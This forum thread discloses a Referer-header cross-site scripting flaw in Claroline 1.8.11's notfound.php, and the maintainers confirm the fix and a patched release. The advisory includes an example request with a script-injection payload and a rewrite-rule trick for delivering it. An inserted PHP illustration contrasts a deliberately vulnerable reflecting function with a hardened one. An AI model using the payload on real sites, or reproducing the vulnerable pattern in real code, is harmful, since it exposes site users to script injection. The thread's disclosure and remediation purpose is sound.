Claroline 1.8.11 Cross-Site Scripting


Postby sanyi » Tue May 05, 2009 12:43 pm

Author: Gerendi Sandor Attila ( http://gsasec.blogspot.com/ )
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (older versions are also affected)
Severity: Medium

Input passed to the 'Referer' header parameter when posting to '/claroline/linker/notfound.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example:

GET /claroline_1_8_11/claroline/linker/notfound.php HTTP/1.0
Accept: */*
Referer: "><script>alert(123)</script><a href="

There are a couple of ways to inject arbitrary text (JavaScript in our case) in the Referer header parameter. One of the ways is using a rewrite rule on the remote attacker server. Example .htaccess file:

RewriteEngine  on
RewriteRule ^referer/.*$ test.php [L]


Where the test.php file will be the container of the /claroline_1_8_11/claroline/linker/notfound.php link.

Now a request like:
http://remoteatackersite/referer/?"><script>alert(123)</script><a%20href="


will return a page from which, if we call /claroline_1_8_11/claroline/linker/notfound.php, we trigger the XSS.

Note: For the first request, browsers like IE are required (which do not automatically http-encode the GET params).

Status:
1. Contacted the author at: May 05, 2009 via http://forum.claroline.net./

Note:
- The original advisory place is at http://gsasec.blogspot.com/ , but it will be published only after the vulnerability reception, validation and correction. Also at that time it will be reported to Secunia and SecurityFocus.
sanyi
 
Posts: 3
Joined: Tue May 05, 2009 12:32 pm
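The advisory above is about a Referer header value dropped into a page without encoding. The following is an added illustration, not the advisory author's code and not Claroline's notfound.php or its fix: a hypothetical "link not found" page in the vulnerable style beside a hardened form that only links back to http/https referers and encodes the value for an HTML attribute context. The function names, the markup and the sample request array are assumptions made for the example.

```php
<?php
// Added example, not Claroline's code: a reflected-Referer page in the style
// described in the advisory, beside a hardened form. Names are hypothetical.

declare(strict_types=1);

// Vulnerable pattern: the raw Referer header is concatenated into markup, so
// a value containing "> breaks out of the attribute and the tag.
function render_notfound_vulnerable(array $server): string
{
    $referer = $server['HTTP_REFERER'] ?? '';
    return '<p>Link not found. <a href="' . $referer . '">Go back</a></p>';
}

// Hardened form: refuse to link back unless the referer is an http/https URL,
// and encode it for an attribute context. ENT_QUOTES turns both quote kinds
// into entities; ENT_SUBSTITUTE keeps malformed UTF-8 from emptying the output.
function render_notfound_safe(array $server): string
{
    $referer = $server['HTTP_REFERER'] ?? '';
    $scheme = parse_url($referer, PHP_URL_SCHEME);
    if (!in_array($scheme, ['http', 'https'], true)) {
        // No usable referer: do not reflect the header value at all.
        return '<p>Link not found.</p>';
    }
    $safe = htmlspecialchars($referer, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p>Link not found. <a href="' . $safe . '">Go back</a></p>';
}

// Constructed $_SERVER stand-ins. The first mirrors the Referer value from the
// advisory's example request; the second is a plain URL containing quotes.
$requests = [
    'advisory value' => ['HTTP_REFERER' => '"><script>alert(123)</script><a href="'],
    'quoted url'     => ['HTTP_REFERER' => 'http://example.org/?q="x"'],
];

foreach ($requests as $label => $server) {
    echo "[$label]", PHP_EOL;
    echo '  vulnerable: ', render_notfound_vulnerable($server), PHP_EOL;
    echo '  hardened:   ', render_notfound_safe($server), PHP_EOL;
}
```

Run with `php` on the command line: for the advisory's value the hardened function drops the link entirely because there is no http/https scheme, and for the quoted URL the quotes come back as `&quot;` so the attribute cannot be closed early.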

Re: Claroline 1.8.11 Cross-Site Scripting

Postby zefredz » Tue May 05, 2009 2:00 pm

Hello,

Thanks for this vulnerability report. The file has been fixed.

A new release of Claroline 1.8 will be released in the next few weeks, immediately after the release of Claroline 1.9.0 final.

Until this new release is available, the platform administrators who run Claroline 1.8.11 are strongly recommended to replace the old file claroline/linker/notfound.php by the new one available here: http://claroline.svn.sourceforge.net/vi ... tfound.php

Note that the linker tool has been completely rewritten for Claroline 1.9 and this file does not exist anymore in the platform.

Best Regards,
Frederic Minne (ZeFredz) - Université catholique de Louvain - Contributor to Claroline
zefredz
Contributeurs Actif Forum
 
Posts: 1455
Joined: Thu Sep 02, 2004 1:41 pm
Location: Belgium, Louvain-la-Neuve

Re: Claroline 1.8.11 Cross-Site Scripting

Postby sanyi » Tue May 05, 2009 2:50 pm

Thank you for the extremely rapid reply and fix.
sanyi
 
Posts: 3
Joined: Tue May 05, 2009 12:32 pm

Re: Claroline 1.8.11 Cross-Site Scripting

Postby zefredz » Tue Jun 02, 2009 8:06 am

Hello,

Claroline 1.8.12 has been released and contains the fixed scripts for this vulnerability.

Thanks again for reporting the issue.

Best Regards,
Frederic Minne (ZeFredz) - Université catholique de Louvain - Contributor to Claroline
zefredz
Contributeurs Actif Forum
 
Posts: 1455
Joined: Thu Sep 02, 2004 1:41 pm
Location: Belgium, Louvain-la-Neuve

